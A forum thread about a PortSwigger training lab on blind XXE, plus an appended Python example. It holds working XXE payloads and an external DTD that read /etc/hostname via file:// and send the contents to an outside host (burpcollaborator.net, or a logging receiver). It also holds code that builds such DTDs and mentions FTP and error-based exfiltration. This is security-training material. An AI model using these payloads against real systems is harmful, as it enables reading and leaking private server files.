Burp Suite User Forum


Web Security Academy - Blind XXE Lab 3 ("Exploiting blind XXE to exfiltrate data using a malicious")

Michael | Last updated: Jun 03, 2019 09:19PM UTC

Dear Support,

I tried the challenge to receive the /etc/hostname using the following.

Initial XML in HTTP request:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "https://ac83206f38f287db80cfc1db01360044.web-security-academy.net/exploit">
  %xxe;
]>
<stockCheck>
  <productId>6</productId>
  <storeId>1</storeId>
</stockCheck>

This should fetch me the further XML lines that should be performed. Surfing the link shows the following code as-is:

<!ENTITY % targetfile SYSTEM "file:///etc/hostname">
<!ENTITY % evaluation "<!ENTITY data SYSTEM 'http://burpcollaborator.net/?x=%targetfile;'>">
%evaluation;
&data;

From my understanding, what I'm missing here is the burpcollaborator host that should receive the file I'm sending here. For this, the Burp Collaborator client should be used according to the "solution", which is a Burp Suite Pro feature. As I did not find any button to access this 'client' otherwise and the Web Security Academy is supposed to be free, I'd like to know what I'm missing here.

Thanks in advance and kind regards,
Michael

PortSwigger Agent | Last updated: Jun 04, 2019 09:12AM UTC

Hi Michael,

Thanks for your message, and good to see you progressing on the Web Security Academy. The Collaborator client is only available in Burp Pro, so unfortunately you can't currently solve that level using Burp Community Edition. We are going to look at options to resolve this in future. In the meantime, there are plenty of labs that you can solve with Burp Community Edition.

Please let us know if you need any further assistance.

Burp User | Last updated: Jun 04, 2019 01:41PM UTC

Hi,

Thanks for your reply, so I did not just miss it ;-) Will go on with other labs, keep up the good work!

Thanks and kind regards,
Michael

Burp User | Last updated: Nov 07, 2019 07:11PM UTC

Why not just receive it using the same Web Security Academy exploit server address? It logs every request that comes in, so you can give it an invalid URL and see the result in the log.
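The following is an added example, not code from PortSwigger or from anyone in this thread. It shows both halves of the exfiltration the posts above argue about: the external DTD you would host (written with parameter entities throughout, because a general-entity reference such as &data; is forbidden inside a DTD outside an entity value), and a small request-logging HTTP server standing in for the receiver, which is exactly the role the last post assigns to the exploit server's access log instead of Burp Collaborator. No XML parser runs here; simulate_victim_parser only issues the one request the %exfil; declaration would make the victim's parser send. All names (build_exfil_dtd, Receiver, simulate_victim_parser, demo) and the sample file contents are constructed for this example.

```python
"""Added example (not PortSwigger's code): host-side DTD plus a logging receiver
for blind XXE exfiltration. All names and sample data are hypothetical."""
import re
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_exfil_dtd(target_file: str, receiver_url: str) -> str:
    """Text to host at the URL that the in-request DOCTYPE points to.

    The chain is %file -> %eval -> %exfil. Expanding %eval; declares a new
    parameter entity whose SYSTEM literal embeds the raw file contents;
    %exfil; then forces the parser to fetch that URL. The inner '%' is written
    as &#x25; because inside an entity value a literal '%' must start a
    parameter-entity reference.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{receiver_url}?x=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


class _LogServer(HTTPServer):
    """HTTPServer that keeps every request path, like an access log."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.hits = []


class _LoggingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.server.hits.append(self.path)  # record the raw path, query included
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep stdout quiet
        pass


class Receiver:
    """Loopback receiver playing the part of Collaborator / the exploit server log."""

    def __init__(self):
        self.server = _LogServer(("127.0.0.1", 0), _LoggingHandler)
        self.thread = threading.Thread(target=self.server.serve_forever, daemon=True)

    def __enter__(self):
        self.thread.start()
        return self

    def __exit__(self, *exc):
        self.server.shutdown()
        self.server.server_close()

    @property
    def url(self) -> str:
        return f"http://127.0.0.1:{self.server.server_address[1]}/"

    def exfiltrated(self) -> list:
        """Pull the x= values back out of the logged request paths."""
        found = []
        for path in self.server.hits:
            query = urllib.parse.urlparse(path).query
            found.extend(urllib.parse.parse_qs(query).get("x", []))
        return found


_URI_ILLEGAL = re.compile(r"[\x00-\x20\x7f]")  # control chars and space are never legal in a URI


def simulate_victim_parser(receiver_url: str, file_contents: str, timeout: float = 5) -> bool:
    """Stand-in for the vulnerable parser: sends the request %exfil; would trigger.

    The file contents go into the SYSTEM literal unencoded. A real parser
    rejects a SYSTEM literal that is not a valid URI, so a file containing
    newlines or spaces (a passwd-style file, for instance) never reaches the
    receiver, while a single-token file such as /etc/hostname does.
    Returns True when the callback was actually sent.
    """
    url = f"{receiver_url}?x={file_contents}"
    if _URI_ILLEGAL.search(url):
        return False
    try:
        with urllib.request.urlopen(url, timeout=timeout):
            return True
    except urllib.error.URLError:
        return False


def demo(file_contents: str, target_file: str = "/etc/hostname"):
    """Run one round trip: host the DTD, fire the callback, read the log."""
    with Receiver() as rx:
        dtd = build_exfil_dtd(target_file, rx.url)  # this is what you would host
        assert "%exfil;" in dtd
        sent = simulate_victim_parser(rx.url, file_contents)
        return sent, rx.exfiltrated()


if __name__ == "__main__":
    print(demo("ac7f1e2d3c4b5a69"))  # constructed hostname: arrives in the log
    print(demo("root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"))
```

In the lab you would replace the loopback URL with the exploit server's own URL and read the value out of its access log, as the last post suggests; the same parse_qs step recovers it there. The second demo call illustrates why the lab targets /etc/hostname: once the file contents carry a newline or a space, the generated URL is not a valid URI and nothing is sent, so multi-line files need a different channel (FTP or error-based exfiltration) rather than a plain HTTP callback.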
